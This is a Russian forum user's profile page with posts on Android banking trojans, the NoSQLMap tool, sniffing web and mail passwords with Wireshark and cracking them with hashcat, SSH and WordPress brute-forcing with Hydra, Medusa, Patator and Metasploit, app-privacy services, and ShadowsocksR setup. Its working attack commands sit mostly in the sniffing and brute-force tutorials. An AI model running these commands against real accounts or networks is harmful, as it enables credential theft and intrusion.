pretty_fucker

Members
  • Публикаций

    31
  • Зарегистрирован

Репутация

0 Neutral

Информация о pretty_fucker

  • Звание
    не местый

Посетители профиля

Блок последних пользователей отключён и не показывается другим пользователям.

  1. Одним прекрасным солнечным майским утром мой завтрак был прерван телефонным звонком друга — предпринимателя, занимавшегося перевозками грузов. Нервным голосом он рассказал, что с его банковского счета куда-то пропали 2 миллиона рублей. А в службе поддержки банка развели руками, отправив товарища писать заявление в полицию, поскольку денежные переводы были совершены с помощью мобильного приложения и подтверждены через SMS, что по всем признакам выглядит вполне легальной финансовой операции. «Ты же программист, — простонал в трубку мой друг, — посоветуй, что делать». К сожалению, что-то делать было уже поздно, ибо инструментом для кражи денег послужил банковский троян (банкер), обосновавшийся на телефоне моего приятеля задолго до этого досадного инцидента. И предотвратить пропажу денег было можно, лишь заранее изучив принципы работы и методы борьбы с таким видом вредоносных приложений. Чем мы в сегодняшней статье и займемся. Банковские трояны раньше Первые полноценные банковские трояны для мобильной платформы Android были обнаружены еще в 2011 году. Нет, вредоносы, способные передавать злоумышленникам входящие SMS-сообщения, в том числе содержащие mTAN-коды (коды аутентификации транзакций), существовали и до этого. Кроме того, были известны трояны, умеющие оперировать USSD-командами. Они могли перевести заданную злодеями сумму с «привязанной» к телефону банковской карты, пополнив баланс левого мобильного телефона, или узнать остаток средств на счете. Но полноценными банковскими троянами, конечно же, не были, поскольку заметно уступали по функциональным возможностям своим десктопным аналогам. Все изменилось с появлением Android.SpyEye. Этот трой работал в связке с вредоносом SpyEye для Windows, благодаря чему обрел способность обходить двухфакторную аутентификацию. Действовал он следующим образом. Как только пользователь зараженной винды открывал в браузере банковский сайт, работающий на компе трой выполнял веб-инжект, встраивая в страницу кусок HTML-кода, который он подгружал из конфига. Поскольку инжект осуществлялся на стороне клиента, URL банковского сайта в адресной строке браузера оказывался корректным, а соединение было установлено по протоколу HTTPS. Поэтому содержимое веб-страницы не вызывало у жертвы никаких подозрений. Текст, встроенный трояном в банковский сайт, гласил, что банк внезапно изменил условия работы и для авторизации в системе банк-клиент необходимо установить на мобильный телефон небольшое приложение размером около 30 Кбайт, скачав его по предложенной ссылке — «в целях безопасности». Приложением, естественно, был мобильный трой Android.SpyEye. Эта вредоносная программа не создавала никаких значков, ее можно было отыскать только в списке работающих процессов под названием «Система». Основная задача троя — перехват всех входящих SMS-сообщений и пересылка их на управляющий сервер, адрес которого вредонос брал из XML-конфига. Когда жертва вводит логин и пароль на банковском сайте в окне браузера, Windows-троян SpyEye перехватывает и отправляет их ботоводам. После этого злоумышленники в любой момент могут авторизоваться с помощью этих данных в системе банк-клиент на сайте банка, однако сервер обязательно отправит владельцу счета проверочный код в SMS, который нужно ввести в специальную форму. Это сообщение будет перехвачено мобильной версией SpyEye и передано вирусописателям. Используя перехват SMS, они смогут выполнять любые операции по счету, например опустошить его подчистую. Примерно так выглядит схема работы первого мобильного банковского трояна SpyEye Узким местом этой довольно сложной схемы была необходимость синхронизации работы банковского и десктопного компонентов троянской связки, однако указанную проблему вирусописателям удалось успешно решить. Несколько месяцев SpyEye наводил шорох среди пользователей банковских сервисов, пока не попал в базы всех популярных антивирусов, после чего его деятельность постепенно сошла на нет. Банковские трояны сегодня Спустя какое-то время сотрудники IT-отделов банков понемногу освоили веб-программирование, и банк-клиенты окончательно перекочевали с десктопов в мобильные телефоны в виде Android-приложений. Это значительно облегчило жизнь вирусописателям: у них отпала необходимость заморачиваться с троянами под винду, и они смогли наконец полностью сосредоточить свои усилия на разработке мобильных банковских троянов. Ведь владелец Android-смартфона с банковским приложением на борту — это ходячий кошелек, опустошить который мечтает каждый уважающий себя вирмейкер. Как и прочие вредоносы для Android, банковские трояны распространялись под видом каких-либо полезных программ — «универсальных видеокодеков» или проигрывателей Flash, в том числе через официальный каталог Google Play. Троянская функциональность таких приложений, естественно, не афишировалась разработчиками, и проявлялась она либо спустя какое-то время, либо после загрузки очередного обновления. Так, в одном из случаев банковский троян раздавался в виде программы, якобы объединяющей в себе возможности банк-клиентов сразу нескольких крупных кредитных организаций. Зачем вам куча отдельных приложений, когда вместо них можно скачать одно, с трояном? Также известны случаи, когда вредоносы встраивались в подлинные приложения некоторых банков, модифицированные злоумышленниками. Такие приложения распространялись с поддельных страниц банков, оформленных в точности как настоящие, а жертв на них завлекали рассылками фишинговых писем. Еще один вектор распространения мобильных банковских троянов — фишинговые SMS-рассылки. Обычно это происходит так. Пользователю, зарегистрированному на одном из сайтов бесплатных объявлений, приходит SMS-сообщение с предложением обмена. При этом получателя называют по имени, что должно усыпить его бдительность, — вирусописатели предварительно распарсили базу пользователей этого сайта, вытянув оттуда всю полезную информацию. При переходе по короткой ссылке из сообщения потенциальная жертва направляется на промежуточную страницу, где определяется, что пользователь зашел на сайт именно с мобильного устройства под управлением Android, и выявляется его мобильный оператор, после чего происходит перенаправление на фейковую страницу с сообщением о поступлении MMS, оформленную в стилистике соответствующего ОПСОСа. После нажатия на кнопку начинается загрузка трояна. Первые мобильные банковские трояны работали очень просто. Если для функционирования вредоноса были нужны права администратора, он настойчиво демонстрировал на экране окно с требованием выдать ему соответствующие полномочия, до тех пор пока измученный пользователь не согласится на это действие. Но иногда вирусописатели шли на различные ухищрения, чтобы обмануть потенциальную жертву. Например, банковский троян Android.BankBot.29 маскировал окно запроса прав администратора под сообщение приложения Google Play: «Ваша версия устарела, использовать новую версию?» При попытке пользователя нажать на экранную кнопку «Да» layout трояна исчезал, и тап попадал на кнопку Accept диалогового окна DeviceAdmin, в результате чего вредонос получал администраторские привилегии. Еще один банковский троян доставал пользователей запросом на включение режима Accessibility Service — специальных возможностей для людей с ограничениями по здоровью. А получив такое разрешение, сам включал для себя админа. Сколько денег подобным образом было похищено со счетов пользователей Android, сказать трудно, но суммы здесь наверняка фигурируют шестизначные. Даже если троянам по какой-то причине не удавалось получить доступ к банковскому счету, они благополучно похищали реквизиты банковских карт. Для этого, например, широко использовались фейковые окна привязки карты к приложению Google Play. Приобрести что-либо ценное в приличных интернет-магазинах с использованием ворованных реквизитов непросто, а вот оплатить онлайн-игрушки или покупку музыки в каком-нибудь сервисе вполне возможно. Подобные сайты редко заморачиваются серьезной проверкой платежных реквизитов, поскольку транзакции там обычно копеечные. Чем и пользуются злоумышленники. Банкботы — разновидность банковского трояна Банкботы — это побочная ветвь эволюции мобильных банковских троянов. Если обычные банковские трои работают более-менее автономно, то банкботы способны получать различные управляющие команды и выполнять их на зараженном девайсе. Команды могут передаваться по HTTP, например в формате JSON, по SMS, а в некоторых случаях даже через специальный Telegram-канал. Большинство банкботов по команде включают или отключают перехват входящих SMS-сообщений, могут скрывать полученные SMS (прятать можно сообщения с определенных номеров или с заданными ключевыми словами), отключать звук мобильного телефона, отправлять сообщения на указанный злоумышленниками номер с заданным содержимым или выполнять USSD-команды. Также ботовод может изменить адрес управляющего сервера или системный номер телефона, на который будет пересылаться информация, если ее не удалось передать по HTTP. Многие банкботы также могут скачивать и устанавливать на мобильном устройстве APK-файлы, ссылку на которые укажет в команде ботовод. В результате на зараженный девайс попадают другие трояны, имеющие более широкий ассортимент функций. Также некоторые банкботы умеют отображать на экране смартфона активити с присланными злодеем параметрами — это открывает широчайшие возможности для фишинга и реализации самых изощренных мошеннических схем. Ну и почти все такие вредоносы умеют сливать на командный сервер адресную книгу, SMS-переписку и прочие конфиденциальные данные, а также переадресовывать входящие звонки на заданный в команде телефонный номер. Отдельные экземпляры троянов ко всему прочему обладают функциями самозащиты: они отслеживают имена работающих в системе процессов и при обнаружении антивируса пытаются выгрузить его, используя права администратора. Практически все банкботы используют веб-админку, предоставляющую ботоводам подробную статистику по инфицированным девайсам и похищенной на них информации. Распространение банковских троянов С распространением мобильных устройств на Android производство троянов для этой платформы стало понемногу превращаться в самую настоящую подпольную индустрию. В полной мере коснулось это и банкеров. В даркнете стали появляться объявления о сдаче банковских троянов под Android в аренду, с предоставлением клиенту админки и технической поддержки. А затем начали распространяться билдеры, с использованием которых любой желающий без каких-либо навыков программирования мог соорудить банковского трояна, маскирующегося под выбранное приложение или определенную систему банк-клиент. Благодаря этому количество банковских троев примерно с 2017 года начало расти если не в геометрической прогрессии, то весьма заметно. И шансы подцепить подобную заразу у пользователей смартфонов на Android тоже значительно выросли. А с учетом того, что большинство подобных вредоносов работает с привилегиями администратора, удалить их с устройства не так-то просто: для этого в лучшем случае придется запустить систему в безопасном режиме, в худшем — сбросить девайс к заводским настройкам со всеми вытекающими последствиями. Защита от банковского трояна Доказанный факт: даже отключение на телефоне возможности установки приложений из сторонних источников далеко не всегда защищает пользователя от проникновения банкеров. Случаев загрузки подобных вредоносов даже из официального каталога Google Play известно множество: технология проверки размещаемых там приложений все еще несовершенна. Кроме того, операционную систему Android отличает значительное количество уязвимостей, которые могут использоваться вирусописателями в своих, отнюдь не благородных целях. Защитить устройство от несанкционированного проникновения зловредов способны антивирусы, но вот устанавливать их или нет — личное дело самих пользователей Android. По крайней мере, мой приятель-коммерсант после инцидента с похищением денег решил больше не испытывать судьбу и скачал на свой телефон такую программу: лишней не будет.
  2. pretty_fucker

    NoSQLMap

    NoSQLMap — это инструмент на Python с открытым исходным кодом предназначенный для аудита и автоматических инъекционных атак и эксплуатаций слабостей (конфигураций с дефолтными учётными данными) в базах данных NoSQL, а также в веб-приложениях, использующих NoSQL, для вскрытия информации из базы данных. В настоящее время использование инструмента фокусируется на MongoDB, но в будущих релизах планируется поддержка таких NoSQL платформ как CouchDB, Redis и Cassandra. Текущие цели проекта — обеспечить инструмент тестирования на проникновение для облегчения атак на сервера MongoDB и веб-приложения, а также концепты атак для развенчания аксиомы, что NoSQL приложения непроницаемы для SQL инъекций. Возможности: Атаки автоматического перечисления и клонирования баз данных MongoDB и CouchDB. Извлечение имён баз данных, пользователей и хешей паролей из MongoDB через веб-приложения. Сканирование подсетей или списка IP в поисках баз данных MongoDB и CouchDB с доступом по умолчанию и перечисление версий. Атака по словарю и брут-форсом по взлому паролей выявленных хешей MongoDB и CouchDB. Инъекционные атаки на параметры PHP приложений для возврата всех записей базы данных. Функция экранирования величин Javascript и инъекции произвольного кода для возврата всех записей базы данных. Основанные на тайминге атаки, сходные со слепыми SQL инъекциями, для валидации уязвимостей инъекций Javascript с приложениями без обратной связи. Скоро ещё больше! Домашняя страница: http://nosqlmap.net/ Автор: Russell Butturini Лицензия: GPLv3 Справка по NoSQLMap Справка отсутствует, утилита не имеет опций командной строки, управление и установка опций осуществляется в интерфейсе похожим на Metasploit Framework. Руководство по NoSQLMap Страница man отсутствует. Использование Запустите так: NoSQLMap Для построения атак, NoSQLMap использует систему, основанную на меню. При старте NoSQLMap перед вами появится следующее меню: Для построения атак, NoSQLMap использует систему, основанную на меню. При старте NoSQLMap перед вами появится следующее меню: 1-Set options (do this first) [Установить опции (начните с этого)] 2-NoSQL DB Access Attacks [Атаки доступа к ДБ NoSQL] 3-NoSQL Web App attacks [Атаки на NoSQL веб-приложения] 4-Scan for Anonymous MongoDB Access [Сканировать на анонимный доступ к MongoDB] x-Exit [Выйти] Объяснение опций: 1. Set target host/IP [Установить целевой хост/IP]-Целевой веб-сервер (например, www.google.com) или сервер MongoDB, который вы хотите атаковать. 2. Set web app port [Установить порт веб-приложения]-TCP порт для веб-приложения, если целью является веб-приложение. 3. Set URI Path [Установить URI]-Часть URI, содержащая имя страницы и любой параметр, НО без имени хоста (к примеру, /app/acct.php?acctid=102). 4. Set HTTP Request Method (GET/POST) [Установить метод HTTP запроса]-Установить метод запроса на GET или POST; В настоящее время реализован только GET, но работа над реализацией POST запросов экспортирована из Burp. 5. Set my local Mongo/Shell IP [Установить IP локальной Mongo/Шелла]-Установите эту опцию для клонирования базы данных или открытия Meterpreter шэлла, если атака экземпляра MongoDB осуществляется на прямой IP целевой установленной Mongo. 6. Set shell listener port [Установить порт прослушивания шэлла]-Если открыт шэлл Meterpreter shells, укажите порт. 7. Load options file [Загрузить файл с опциями]-Загрузить предварительно сохранённый набор настроек для 1-6. 8. Load options from saved Burp request [Загрузить опции из запросов Burp]-Разобрать сохранённые от Burp Suite запросы и заполнить параметры веб-приложений. 9. Save options file [Сохранить файл с опциями]-Сохранить настройки 1-6 для будущего использования. x. Back to main menu [Назад в главное меню]-Используйте это, как только настроили опции для атаки. После настройки главных опций вернитесь в главное меню и выберите атаки доступа DB или атаки веб-приложения в соответствие с тем, что вы атакуете — порт под управлением NoSQL или веб-приложение. Примеры запуска NoSQLMap В Kali Linux: NoSQLMap В BlackArch: nosqlmap Установка NoSQLMap Установка в Kali Linux Для клонирования удалённой БД MongoDB на локальную машину нужна установленная MongoDB. git clone https://github.com/tcstool/NoSQLMap.git cd NoSQLMap sudo python setup.py install NoSQLMap Установка в BlackArch Программа предустановлена в BlackArch. Но для клонирования удалённой БД MongoDB на локальную машину нужна установленная MongoDB. Для её установки воспользуйтесь инструкцией «Установка MongoDB в Arch / BlackArch». sudo pacman -S nosqlmap python2-pip sudo pip2 install requests
  3. Многие пользователи и не догадываются, что заполняя логин и пароль при регистрации или авторизации на закрытом Интернет-ресурсе и нажимая ENTER, эти данные легко могут перехватить. Очень часто они передаются по сети не в защищенном виде. Поэтому если сайт, на котором вы пытаетесь авторизоваться, использует HTTP протокол, то очень просто выполнить захват этого трафика, проанализировать его с помощью Wireshark и далее с помощью специальных фильтров и программ найти и расшифровать пароль. Лучшее место для перехвата паролей – ядро сети, где ходит трафик всех пользователей к закрытым ресурсам (например, почта) или перед маршрутизатором для выхода в Интернет, при регистрациях на внешних ресурсах. Настраиваем зеркало и мы готовы почувствовать себя хакером. Шаг 1. Устанавливаем и запускаем Wireshark для захвата трафика Иногда для этого достаточно выбрать только интерфейс, через который мы планируем захват трафика, и нажать кнопку Start. В нашем случае делаем захват по беспроводной сети. Захват трафика начался. Шаг 2. Фильтрация захваченного POST трафика Открываем браузер и пытаемся авторизоваться на каком-либо ресурсе с помощью логина и пароля. По завершению процесса авторизации и открытия сайта мы останавливаем захват трафика в Wireshark. Далее открываем анализатор протоколов и видим большое количество пакетов. Именно на этом этапе большинство ИТ-специалистов сдаются, так как не знают, что делать дальше. Но мы знаем и нас интересуют конкретные пакеты, которые содержат POST данные, которые формируются на нашей локальной машине при заполнении формы на экране и отправляются на удаленные сервер при нажатии кнопки «Вход» или «Авторизация» в браузере. Вводим в окне специальный фильтр для отображения захваченных пакетов: http.request.method == “POST” И видим вместо тысячи пакетов, всего один с искомыми нами данными. Шаг 3. Находим логин и пароль пользователя Быстрый клик правой кнопки мыши и выбираем из меню пункт Follow TCP Steam После этого в новом окне появится текст, который в коде восстанавливает содержимое страницы. Найдем поля «password» и «user», которые соответствуют паролю и имени пользователя. В некоторых случаях оба поля будут легко читаемы и даже не зашифрованы, но если мы пытаемся захватить трафик при обращении к очень известным ресурсам типа: Mail.ru, Facebook, Вконтакте и т.д., то пароль будет закодирован: HTTP/1.1 302 Found Date: Mon, 10 Nov 2014 23:52:21 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: non=non; expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/ Set-Cookie: password=e4b7c855be6e3d4307b8d6ba4cd4ab91; expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/ Set-Cookie: scifuser=networkguru; expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/ Location: loggedin.php Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 Таким образом, в нашем случае: Имя пользователя: networkguru Пароль: e4b7c855be6e3d4307b8d6ba4cd4ab91 Шаг 4. Определение типа кодирования для расшифровки пароля Заходим, например, на сайт http://www.onlinehashcrack.com/hash-identification.php#res и вводим наш пароль в окно для идентификации. Мне выдан был список протоколов кодирования в порядке приоритета: MD5 NTLM MD4 LM Шаг 5. Расшифровка пароля пользователя На данном этапе можем воспользоваться утилитой hashcat: ~# hashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt На выходе мы получили расшифрованным пароль: simplepassword Таким образом, с помощью Wireshark мы можем не только решать проблемы в работе приложений и сервисов, но и также попробовать себя в роли хакера, осуществляя перехват паролей, которые пользователи вводят в веб-формах. Также можно узнавать и пароли к почтовым ящикам пользователей, используя незатейливые фильтры для отображения: Протокол POP и фильтр выглядит следующим образом: pop.request.command == "USER" || pop.request.command == "PASS" Протокол IMAP и фильтр будет: imap.request contains "login" Протокол SMTP и потребуется ввод следующего фильтра: smtp.req.command == "AUTH" и более серьезные утилиты для расшифровки протокола кодирования. Шаг 6. Что делать, если трафик зашифрован и используется HTTPS? Для ответа на этот вопрос есть несколько вариантов. Вариант 1. Подключиться в разрыв соединения между пользователем и сервером и захватить трафик в момент установления соединения (SSL Handshake). В момент установки соединения можно перехватить сеансовый ключ. Вариант 2. Вы можете расшифровать трафик HTTPS, используя файл журнала сеансовых ключей, записываемый Firefox или Chrome. Для этого браузер должен быть настроен на запись этих ключей шифрования в файл журнала (пример на базе FireFox), и вы должны получить этот файл журнала. По сути, необходимо похитить файл с ключом сессии с жесткого диска другого пользователя (что является незаконным). Ну а далее захватить трафик и применить полученный ключ для его расшифровки. Уточнение. Мы говорим о веб-браузере человека, у которого пытаются украсть пароль. Если же мы подразумеваем расшифровку нашего собственного HTTPS трафика и хотим потренироваться, то эта стратегия будет работать. Если вы пытаетесь расшифровать HTTPS трафик других пользователей без доступа к их компьютерам, это не сработает – на то оно и шифрование, и личное пространство. После получения ключей по варианту 1 или 2 необходимо прописать их в WireShark: Идем в меню Edit – Preferences – Protocols – SSL. Ставим флаг «Reassemble SSL records spanning multiple TCP segments». «RSA keys list» и нажимаем Edit. Вводим данные во все поля и прописываем путь в файлу с ключом WireShark может расшифровывать пакеты, которые зашифрованы с использованием алгоритма RSA. В случае если используются алгоритмы DHE/ECDHE, FS, ECC, сниффер нам не помощник. Вариант 3. Получить доступ к web-серверу, которым пользуется пользователь, и получить ключ. Но это является еще более сложной задачей. В корпоративных сетях с целью отладки приложений или контент фильтрации этот вариант реализуется на легальной основе, но не с целью перехвата паролей пользователей.
  4. Вся информация предоставлена исключительно в ознакомительных целях. Ни автор, ни администрация не несут ответственности за любой возможный вред, причиненный материалами данной статьи.Применение в корыстных целях карается законодательством РФ. Brute-force -это математический метод, сложность которого зависит от ряда всех возможных решений. Определение «грубая сила» обычно используется в контексте хакерских атак, когда злоумышленник пытается найти действительный логин/пароль для учетной записи или службы. Рассмотрим инструменты, которые можно использовать для атак грубой силы на SSH и веб-сервисы, доступные в Kali Linux (Patator, Medusa, THC Hydra, Metasploit) и BurpSuite. Все материалы, приведенные в данной статье, предназначены для образовательных целей. Использование материалов в незаконных целях запрещено. Brute-force SSH В качестве примера возьмем тестовую машину 192.168.60.50 и попробуем найти тестовый пароль пользователя с помощью SSH. Мы будем использовать популярные пароли из стандартного словаря rockyou.txt Patator Чтобы найти пароль с картофелем используйте команду: patator ssh_login host=192.168.60.50 user=test password=FILE0 0=/root/wordlist -x ignore:mesg=’Authentication failed’ где: ssh_login-это необходимый модуль; host — это наша цель; user-это логин пользователя, для которого найден пароль, либо файл содержит множество Логинов для многократного поиска; password — это словарь, содержащий пароли; X ignore: mesg=’Authentication failed’ — это команда не отображать строку, содержащую это сообщение. Параметр фильтрации выбирается индивидуально. THC Hydra Для майнинга паролей с помощью THC Hydra выполните команду: hydra -V -f -t 4 -l test -P /root/wordlist ssh://192.168.60.50 где: V-для отображения пары логин + пароль во время майнинга пароля; f-это остановка, как только будет найден пароль для указанного логина; P-это путь к словарю паролей; ssh: / / 192.168.60.50-это IP-адрес жертвы. Medusa Для майнинга паролей с помощью Medusa выполните команду: medusa -h 192.168.60.50 -u test -P /root/wordlist -M ssh -f -v 6 где: h- его жертва IP-адрес; u — это логин; P — это путь к словарю; M-это выбор модуля; F-это остановка, как только будет найдена действительная пара логин/пароль; v-это настройка отображения сообщения на мониторе во время майнинга паролей. Metasploit Найдите инструмент для атаки грубой силы с помощью SSH: search ssh_login Использовать модуль: use auxiliary/scanner/ssh/ssh_login Используйте команду Показать параметры для просмотра необходимых параметров. Для нас это: rhosts-это IP адрес жертвы; rport — это порт; username-это SSH логин; user pass_file-это путь к словарю; stop_on_success-это остановка, как только будет найдена пара логин/пароль; threads — количество потоков. Индикация необходимых параметров осуществляется с помощью команды «set». set rhosts 192.168.60.50 set username test set userpass_file /root/wordlist set stop_on_success yes set threads 4 set rport 22 Когда будут указаны необходимые параметры, введите команду «Выполнить» и подождите. Ограничьте количество установленных подключений с помощью брандмауэра. Пример настройки iptables в: -A INPUT -i eth0 -p tcp --dport 22 -m connlimit --connlimit-above 1--connlimit-mask 32 -j REJECT --reject-with tcp-reset. Это правило ограничит доступ к SSH для каждого IP-адреса до 1 соединения в секунду, что сделает грубую силу более сложной. Также эффективным решением может быть использование двухфакторной аутентификации (например, с помощью токена) или аутентификации с использованием инфраструктуры открытых ключей (PKI) и использование ACL на основе IP-адресов. BurpSuite Сначала необходимо разобраться в процессе авторизации. Для этого мы будем использовать Burp Suite. Чтобы проверить, какие запросы проходят через BurpSuite, мы должны попытаться авторизоваться с помощью любого пароля и логина. Молодцы, мы увидели пост запроса на авторизацию и будем с ним работать. В теле отмечено, какие логин и пароль были проверены, то есть мы можем попробовать заполнить необходимые значения. Передайте этот запрос злоумышленнику и выберите там необходимые параметры атаки. В точке полезной нагрузки позиции оставьте типа атаки снайпер, но для проверки оставьте параметр pwd только. Таким образом, только этот параметр будет меняться во время атаки. Скачайте необходимый словарь и начните атаку: По поведению веб-приложения мы видим, что неверный пароль возвращает код ответа 200. После словаря, грубой силы, мы видим, что один из паролей дал ответ код 302 — это пароль правильный. Этот метод занимает гораздо больше времени, чем при использовании Patator, THC Hydra, Medusa и др. Даже с учетом того, что мы использовали небольшой словарь, Burp Suite искал пароль около 40 минут. THC Hydra Давайте попробуем найти пароль с помощью THC Hydra. Как мы знаем, если авторизация является неправильной код 200, если авторизация является правильной код 302. Попробуйте использовать эту информацию. Для начала используйте команду: мydra -V -f -l admin -P /root/wordlist -t 4 http-post-form://192.168.60.50 -m “/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.60.50%2Fwp-admin%2F&testcookie=1:S=302” Здесь мы будем заполнять необходимые параметры: I — это имя пользователя; P-это словарь паролей; t — это число потоков; http-post-form — это тип формы (в нашем случае POST); /wp-login.php-это URL страницы авторизации; ^^USER^ — показывает, где должно быть заполнено имя пользователя; ^PASS^ — показывает, где должен быть заполнен пароль из словаря; S=302-это указание, к которому относится ответ THC Hydra. В нашем случае, если авторизация прошла успешно ответ 302. Nmap Утилита Nmap позволяет производить майнинг паролей для авторизации веб-форм при использовании http-wordpress-brute с соответствующими аргументами: — script-args-это добавление аргументов; user или userdb-это логин или файл, содержащий логины; pass or passdb — это пароль или словарь признаков; thread -это ряд потоков; first only=true-для отображения результатов после первых правильных паролей. nmap 192.168.60.50 --script http-wordpress-brute --script-args ‘user= admin,passdb= /root/wordlist, http-wordpress-brute.thread=3, brute.firstonly=true’ Противодействие Ограничьте (усложните) атаки грубой силы на веб-приложения с использованием iptables (например, SSH) и инструментов Nginx: … limit_req_zone $binary_remote_addr zone=req_limits:10m rate=30r/s; … location / { … limit_req zone=req_limits burst=10; limit_req_status 429; … } Эти настройки позволят ограничить число запросов от одного IP-адреса до 40 в секунду. Чтобы запутать задачу интеллектуального анализа паролей, используйте следующий метод: использование брандмауэра и другого программного обеспечения для ограничения количества запросов к защищенной службе; использовать инструменты против быстрой проверки подлинности ключа (например Captcha). Вывод В этой статье мы поверхностно рассмотрели некоторые из популярных инструментов. Для снижения риска нападения грубой силы следуйте рекомендациям: использовать жесткий для взлома паролей; не создавать пароли с использованием личных данных, например дата рождения или имя+дата рождения или номер телефона; регулярно меняйте пароль; используйте разные пароли для каждой учетной записи. Не так много людей следуют этим рекомендациям (а также рекомендациям по безопасной веб-разработке), поэтому необходимо использовать различные программные решения: ограничить подключение по IP-адресу или, если это невозможно, ограничить одновременное количество подключений к серверу (используя iptables, Nginx и т. д.); использование двухфакторной аутентификации; обнаружение и блокировка этих атак с помощью SIEM, WAF или других инструментов (например fail2ban).
  5. Большинство приложений собирают ту или иную информацию о пользователе. Иногда данные необходимы программам для работы — например, навигатору нужна информация о вашем местоположении, чтобы проложить удобный маршрут. Также нередко разработчики используют информацию о вас для монетизации или улучшения сервиса — предварительно заручившись вашим согласием. Например, собирают анонимную статистику, чтобы понять, в каком направлении развивать программу. Однако некоторые разработчики могут злоупотреблять вашим доверием: собирать информацию, которая никак не связана с функциональностью их программы, и продавать ваши данные третьим лицам, причем нередко втайне от вас. По счастью, в Сети есть сервисы, с помощью которых вы можете вывести такое приложение на чистую воду. Сервис AppCensus Сервис AppCensus дает возможность узнать, какие личные данные и куда отправляет приложение. Для этого применяется метод динамического анализа: программу устанавливают на реальное мобильное устройство, предоставляют ей все запрашиваемые разрешения и активно используют ее в течение определенного промежутка времени. При этом специалисты сервиса отслеживают, какие данные, кому именно и в каком виде — зашифрованном или незашифрованном — она отправляет. Такой подход позволяет получить результат, отражающий реальное поведение приложения. Если вас что-то смущает в той информации, которую может выдать AppCensus, вы сможете отказаться от программы и поискать более скромный аналог, не пытающийся разнюхать о вас слишком много. Однако информация на AppCensus может оказаться неполной: программу тестируют лишь ограниченное время, а часть функций приложения может активироваться далеко не сразу. К тому же AppCensus изучает только бесплатные и общедоступные Android-приложения. Сервис Exodus Privacy В отличие от AppCensus, Exodus Privacyизучает не поведение, а само приложение. В частности, сервис оценивает разрешения, которые запрашивает программа, и ищет встроенные трекеры — сторонние модули, предназначенные для сбора данных о вас и ваших действиях. Как правило, разработчики добавляют в свои приложения трекеры рекламных сетей, с помощью которых те пытаются узнать вас как можно лучше и показывать персонализированные объявления. Сейчас сервису известно более 200 видов таких трекеров. Что касается разрешений, то Exodus Privacy оценивает их с точки зрения опасности для вас и ваших данных. Если приложение запрашивает доступы, которые могут угрожать приватности или нарушить защиту устройства, сервис это отметит. Если вам кажется, что потенциально опасные разрешения не нужны приложению для нормальной работы, лучше их ему не выдавать. В случае необходимости вы сможете расширить его права позже. Секретики приложений Пользоваться обоими сервисами очень просто. Достаточно ввести название программы в поле поиска — и вы получите исчерпывающую информацию о том, какими данными она интересуется и куда их отправляет. В отличие от AppCensus, Exodus позволяет не только выбирать приложения из списка, но и самостоятельно указывать, какие программы взять из Google Play для изучения на вкладке New analysis. Мы взяли для примера селфи-камеру с 5 миллионами установок из Google Play. Exodus Privacy показывает, что она использует четыре рекламных трекера и требует доступ не только к камере, но и к местоположению устройства, которое для ее работы не то чтобы обязательно (в теории она может делать это из благих побуждений — чтобы прописывать геометки в EXIF-данные фотографий), и к информации о телефоне и звонках, которая ей уж точно ни к чему. Анализ того же приложения, предложенный AppCensus, только добавляет вопросов: по данным сервиса, селфи-камера не просто получает доступ к местонахождению вашего смартфона или планшета, но и отправляет эту информацию вместе с IMEI (уникальным идентификатором вашего устройства в сотовой сети), MAC-адресом (еще одним уникальным номером, по которому устройство можно опознать в Интернете и локальных сетях) и Android ID (номером, который присваивается вашей системе при первом запуске) на некий китайский IP-адрес в незашифрованном виде. То есть про благие побуждения можно забыть. Получается, что к данным, по которым можно однозначно отслеживать перемещения вашего гаджета, получает доступ кто-то в Китае, а еще кто угодно может перехватить их при передаче. Кому эти данные продаются или передаются — тоже хороший вопрос. При этом в политике приватности разработчики заявляют, что не собирают личных данных о пользователе и не передают никому информацию о местоположении устройства. Можно ли защититься от слежки? Как видите, популярное приложение с ничем не примечательной политикой приватности может подвергать опасности чувствительные данные. Поэтому мы рекомендуем относиться к мобильным программам с осторожностью: Не устанавливайте приложения на устройство просто так. Они могут следить за вами, даже если вы ими не пользуетесь и не открываете. А если уже установленная программа вам не нужна, удалите ее. Перед установкой неизвестных вам приложений проверяйте их при помощи сервисов AppCensus и Exodus Privacy. Если результат анализа вас смутит, откажитесь от программы и поищите другую.
  6. Shadowsocks является открытым исходным кодом программное обеспечение , которое скрывает или искажает интернет - соединения. Он широко используется в Китае для обхода цензуры в Интернете. Он был создан в 2012 году китайским программистом по имени «clowwindy», и с тех пор стало доступно несколько реализаций протокола. Недавно Great Firewall начал блокировать серверы Shadowsocks так же, как они блокируют VPN-серверы. В Китае все еще можно использовать Shadowsocks , но вам может потребоваться перестроить свой сервер с новым IP-адресом, если он заблокирован. Последняя рекомендация - использовать ShadowsocksR (SSR) с запутыванием, следуя инструкции, вставленной ниже. Хотя ShadowsocksR все еще можно заблокировать, вероятность его обнаружения меньше. Список приложений ShadowsocksR ShadowsocksR для Windows ShadowsocksR для Android ShadowsocksR для Mac iOS Potatso Lite (БЕСПЛАТНО) iOS Shadowrocket ($ 2,99) Поставщики ShadowSocks Эти компании, очевидно, предоставляют услуги Shadowsocks в Китае: https://shadowtunnelz.com и https://hdsocks.com Как настроить ShadowsocksR на VPS Шаг 1. Получить VPS от Vultr.com. Аренда VPS от Vultr Вам нужна биткойн, кредитная карта, Paypal, Alipay, UnionPay или WeChat Pay Перейдите в «Серверы», нажмите «+» и разверните новый экземпляр. Выберите эти варианты: Сервер: Токио Тип сервера: Debian 7 x64 Пакет: $ 2,50 (самый дешевый, поставляется с 500 ГБ трафика) Дополнительные функции: Включить IPv6 Шаг 2. Установите ShadowsocksR Войдите на свой сервер, используя Putty или любой другой SSH-клиент. wget –no-check-certificate https://raw.githubusercontent.com/teddysun/shadowsocks_install/master/shadowsocks-all.sh chmod + x shadowsocks-all.sh ./shadowsocks-all.sh 2> & 1 | тройник shadowsocks-all.log Сценарий установки сделает все за вас. Выберите опцию 2. ShadowsocksR, выберите пароль и порт (подойдет любой порт). Нажмите ввод и дождитесь его завершения. После того, как это будет сделано, он отобразит конфигурацию. 